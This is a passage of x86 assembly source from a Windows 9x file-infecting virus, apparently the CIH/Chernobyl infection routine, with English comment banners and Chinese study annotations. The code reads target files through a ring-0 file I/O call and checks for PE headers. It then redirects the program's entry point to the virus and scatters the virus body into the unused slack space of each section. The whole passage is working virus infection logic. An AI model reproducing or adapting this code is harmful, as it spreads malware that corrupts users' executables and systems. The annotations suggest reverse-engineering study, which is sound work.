mov eax, ebp ;功能号
call edi ; VXDCall IFSMgr_Ring0_FileIO ;读文件到esi
; ***************************
; * Is PE !? *
; ***************************
; * Is the File *
; * Already Infected !? *
; ***************************
; * WinZip Self-Extractor *
; * doesn't Have Infected *
; * Mark Because My Virus *
; * doesn't Infect it. *
; ***************************
; cmp [esi], '\0PE\0'
cmp dword ptr [esi], 00455000h ;判断是否是PE文件(标志"PE\0\0")
jne CloseFile ;不是就关闭文件
; *************************************
; * The File is ^o^ *
; * PE(Portable Executable) indeed. *
; *************************************
; * The File isn't also Infected. *
; *************************************
; *************************************
; * Start to Infect the File *
; *************************************
; * Registers Use Status Now : *
; * *
; * EAX = 04h *
; * EBX = File Handle *
; * ECX = 04h *
; * EDX = 'PE\0\0' Signature of *
; * ImageFileHeader Pointer's *
; * Former Byte. *
; * ESI = DataBuffer Address ==> @8 *
; * EDI = IFSMgr_Ring0_FileIO Address *
; * EBP = D600h ==> Read Data in File *
; *************************************
; * Stack Dump : *
; * *
; * ESP => ------------------------- *
; * | EFLAG(CF=0) | *
; * ------------------------- *
; * | FileNameBufferPointer | *
; * ------------------------- *
; * | EDI | *
; * ------------------------- *
; * | ESI | *
; * ------------------------- *
; * | EBP | *
; * ------------------------- *
; * | ESP | *
; * ------------------------- *
; * | EBX | *
; * ------------------------- *
; * | EDX | *
; * ------------------------- *
; * | ECX | *
; * ------------------------- *
; * | EAX | *
; * ------------------------- *
; * | Return Address | *
; * ------------------------- *
; *************************************
push ebx ; Save File Handle ;保存文件句柄
push 00h ; Set VirusCodeSectionTableEndMark
; ***************************
; * Let's Set the *
; * Virus' Infected Mark *
; ***************************
push 01h ; Size
push edx ; Pointer of File ;edx指向PE文件头偏移00h
push edi ; Address of Buffer ;edi为IFSMgr_Ring0_FileIO的地址(原注释有误)
; ***************************
; * Save ESP Register *
; ***************************
mov dr1, esp
; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Only First Set Size ) *
; ***************************
push eax ; Size
; ***************************
; * Let's Read *
; * Image Header in File *
; ***************************
mov eax, ebp
mov cl, SizeOfImageHeaderToRead ;要读2个字节(WORD NumberOfSections)
add edx, 07h ; Move EDX to NumberOfSections ;PE文件头+07h为NumberOfSections(块个数)
call edi ; VXDCall IFSMgr_Ring0_FileIO ;读出NumberOfSections(块个数)到esi
; ***************************
; * Let's Set the *
; * NewAddressOfEntryPoint *
; * ( Set Pointer of File, *
; * Address of Buffer ) *
; ***************************
lea eax, (AddressOfEntryPoint-@8)[edx]
push eax ; Pointer of File
lea eax, (NewAddressOfEntryPoint-@8)[esi]
push eax ; Address of Buffer
; ***************************
; * Move EDX to the Start *
; * of SectionTable in File *
; ***************************
movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi]
lea edx, [eax+edx+12h] ;edx为SectionTable的偏移
; ***************************
; * Let's Get *
; * Total Size of Sections *
; ***************************
mov al, SizeOfScetionTable ;每个块表项(ScetionTable)的大小(字节)
; I Assume NumberOfSections <= 0ffh
mov cl, (NumberOfSections-@8)[esi]
mul cl ;每个块表项乘以块个数=块表大小
; ***************************
; * Let's Set Section Table *
; ***************************
; Move ESI to the Start of SectionTable
lea esi, (StartOfSectionTable-@8)[esi] ;esi指向块表首址(在病毒动态数据区中)
push eax ; Size ;块表大小
push edx ; Pointer of File ;edx为SectionTable的偏移
push esi ; Address of Buffer ;
; ***************************
; * The Code Size of Merge *
; * Virus Code Section and *
; * Total Size of Virus *
; * Code Section Table Must *
; * be Small or Equal the *
; * Unused Space Size of *
; * Following Section Table *
; ***************************
inc ecx
push ecx ; Save NumberOfSections+1
shl ecx, 03h ;*8
push ecx ; Save TotalSizeOfVirusCodeSectionTable ;预留病毒块表空间
add ecx, eax
add ecx, edx ;ecx+文件的正文的偏移
sub ecx, (SizeOfHeaders-@9)[esi]
not ecx
inc ecx ;求补
;ecx为文件头大小-正文的偏移=未用空间
; Save My Virus First Section Code
; Size of Following Section Table...
; ( Not Include the Size of Virus Code Section Table )
push ecx
xchg ecx, eax ; ECX = Size of Section Table ;ecx为块表大小
; Save Original Address of Entry Point
mov eax, (AddressOfEntryPoint-@9)[esi] ;入口RVA地址
add eax, (ImageBase-@9)[esi] ;装入基址
mov (OriginalAddressOfEntryPoint-@9)[esi], eax ;保存装入后实际的入口地址
cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection ;未用空间和病毒第一块大小比较
jl OnlySetInfectedMark ;小于就只设感染标志
; ***************************
; * Read All Section Tables *
; ***************************
mov eax, ebp ;读的功能号
call edi ; VXDCall IFSMgr_Ring0_FileIO ;读块表到esi(@9处)
; ***************************
; * Full Modify the Bug : *
; * WinZip Self-Extractor *
; * Occurs Error... *
; ***************************
; * So When User Opens *
; * WinZip Self-Extractor, *
; * Virus Doesn't Infect it.*
; ***************************
; * First, Virus Gets the *
; * PointerToRawData in the *
; * Second Section Table, *
; * Reads the Section Data, *
; * and Tests the String of *
; * 'WinZip(R)'...... *
; ***************************
xchg eax, ebp
push 00000004h
pop ecx ;读4字节
push edx
mov edx, (SizeOfScetionTable+PointerToRawData-@9)[ebx] ;edx为第二块的偏移(.rdata)
add edx, 12h ;加10h+2h(10h处为"WinZip....")
call edi ; VXDCall IFSMgr_Ring0_FileIO ;读4字节到esi
; cmp [esi], 'nZip'
cmp dword ptr [esi], 'piZn' ;判断是否是WinZip自解压文件
je NotSetInfectedMark ;是就不设置感染标志
pop edx ;edx指向块表在文件中首址
; ***************************
; * Let's Set Total Virus *
; * Code Section Table *
; ***************************
; EBX = My Virus First Section Code
; Size of Following Section Table
pop ebx ; 未用空间大小
pop edi ; EDI = TotalSizeOfVirusCodeSectionTabl
pop ecx ; ECX = NumberOfSections+1
push edi ; Size
add edx, ebp ; ebp为块表大小
push edx ; Pointer of File ;指向块表后(第一块)
add ebp, esi ; ebp指向病毒数据区的块表后(第一块)
push ebp ; Address of Buffer
; ***************************
; * Set the First Virus *
; * Code Section Size in *
; * VirusCodeSectionTable *
; ***************************
lea eax, [ebp+edi-04h]
mov [eax], ebx ;设置病毒代码第一块的大小(未用空间大小)到病毒块表
; ***************************
; * Let's Set My Virus *
; * First Section Code *
; ***************************
push ebx ; Size ;病毒代码第一块的大小(未用空间大小)
add edx, edi
push edx ; Pointer of File ;指向块表后(第一块)+Size??=病毒正文(病毒开始处)
lea edi, (MyVirusStart-@9)[esi]
push edi ; Address of Buffer ;指向病毒开始处
; ***************************
; * Let's Modify the *
; * AddressOfEntryPoint to *
; * My Virus Entry Point *
; ***************************
mov (NewAddressOfEntryPoint-@9)[esi], edx ;保存新的程序入口(病毒正文)
; ***************************
; * Setup Initial Data *
; ***************************
lea edx, [esi-SizeOfScetionTable] ;edx先减一项块表长度,以配合下面的"助标1"
mov ebp, offset VirusSize ;ebp为病毒长度
jmp StartToWriteCodeToSections
; ***************************
; * Write Code to Sections *
; ***************************
LoopOfWriteCodeToSections:
add edx, SizeOfScetionTable ;助标1:
;指向下一块表项
mov ebx, (SizeOfRawData-@9)[edx] ;ebx为该块表项的SizeOfRawData(块大小)
sub ebx, (VirtualSize-@9)[edx] ;减去VirtualSize=该块未用空间
jbe EndOfWriteCodeToSections
push ebx ; Size
sub eax, 08h
mov [eax], ebx ;写入病毒块表
mov ebx, (PointerToRawData-@9)[edx] ;ebx为块的物理(实际)偏移?
add ebx, (VirtualSize-@9)[edx] ;加上VirtualSize
push ebx ; Pointer of File ;ebx指向该块未用空间的文件指针
push edi ; Address of Buffer
mov ebx, (VirtualSize-@9)[edx]
add ebx, (VirtualAddress-@9)[edx]
add ebx, (ImageBase-@9)[esi] ;ebx为该块装入后的实际地址
mov [eax+4], ebx ;保存到病毒块表中
mov ebx, [eax] ;该块未用空间大小
add (VirtualSize-@9)[edx], ebx ;加到该块表项的VirtualSize
; Section contains initialized data ==> 00000040h
; Section can be Read. ==> 40000000h
or (Characteristics-@9)[edx], 40000040h ;改该块表项的块属性(改为可读,并包含初始化数据)
StartToWriteCodeToSections:
sub ebp, ebx ;病毒大小-病毒块大小
jbe SetVirusCodeSectionTableEndMark ;如果小于(病毒插入完毕)就设置病毒块表结束符
add edi, ebx ; Move Address of Buffer ;指向病毒下一块
EndOfWriteCodeToSections:
loop LoopOfWriteCodeToSections
; ***************************
; * Only Set Infected Mark *
; ***************************
OnlySetInfectedMark:
mov esp, dr1 ;只设置感染标志
jmp WriteVirusCodeToFile ;跳到写病毒到要传染的文件的程序
; ***************************
;